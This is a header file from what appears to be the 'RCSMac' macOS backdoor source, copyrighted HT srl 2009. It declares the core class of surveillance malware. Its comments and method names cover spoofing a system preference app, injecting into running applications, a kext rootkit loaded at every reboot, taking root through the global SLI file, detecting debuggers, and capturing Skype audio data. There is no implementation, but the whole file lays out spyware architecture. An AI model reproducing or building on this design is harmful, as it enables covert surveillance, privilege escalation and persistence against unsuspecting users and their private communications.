core/RCSMCore.h
/*
* RCSMac - Core Header
*
* Created by Alfredo 'revenge' Pesoli on 16/04/2009
* Copyright (C) HT srl 2009. All rights reserved
*
*/
#import <Cocoa/Cocoa.h>
#ifndef __RCSMCore_h__
#define __RCSMCore_h__
#import "RCSMUtils.h"
#import "RCSMSharedMemory.h"
//
// Available modes for our backdoor
// mode: Ah57K set by "require admin privileges"
// Ah56K set by no "require admin privileges" flagged
//
#define SLIPLIST @"Ah56K"
#define UISPOOF @"Ah57K"
#define DYLIB @"Ah58K"
#define DEV @"Ah59K"
@class __m_MLogManager;
@interface __m_MCore : NSObject
{
@private
// backdoor ID returned by our kext -- not used as of now
//int mBackdoorID;
// advisory lock descriptor -- not used as of now.
//int mLockFD;
@private
// backdoor executable binary name
NSString *mBinaryName;
// backdoor app bundle name (without .app)
NSString *mApplicationName;
// path to spoofed app name (system pref)
NSString *mSpoofedName;
@private
NSString *mMainLoopControlFlag; // @"START" | @"STOP" | @"RUNNING"
//BOOL mCanSyncThroughSafari;
@private
NSMutableData *skypeInputData;
NSMutableData *skypeOutputData;
}
@property (readwrite, retain) NSString *mBinaryName;
@property (readwrite, retain) NSString *mApplicationName;
@property (readwrite, retain) NSString *mSpoofedName;
@property (readwrite, retain) NSString *mMainLoopControlFlag;
- (id)init;
- (void)dealloc;
- (void)shareCorePidOnShMem;
- (void)injectRunningApp;
- (void)injectBundle: (NSNotification *)notification;
- (void)sendEventToPid: (NSNumber *)thePid;
// Create the kext plist file to be used with launchctl in order to load the
// kext at every reboot.
// TODO: Check if we need to make the whole backdoor resident here or split
// rootkit/backdoor
//
- (BOOL)makeBackdoorResident;
- (BOOL)amIResident;
//
// Init uspace<->kspace communication channel (ioctl MCHOOK_INIT)
// return backdoorID to be used for all the future operations (ioctl requests)
//
- (int)connectKext;
//
// Add the backdoor to the global SLI file in order to get root on the next
// reboot
//
- (void)UISudoWhileAlreadyAuthorized: (BOOL)amIAlreadyAuthorized;
- (BOOL)getRootThroughSLI;
//
// Threaded (always running) - true if the current process is being debugged
// (either running under the debugger or has a debugger attached post facto)
//
- (BOOL)runMeh;
- (void)xfrth;
@end
#endif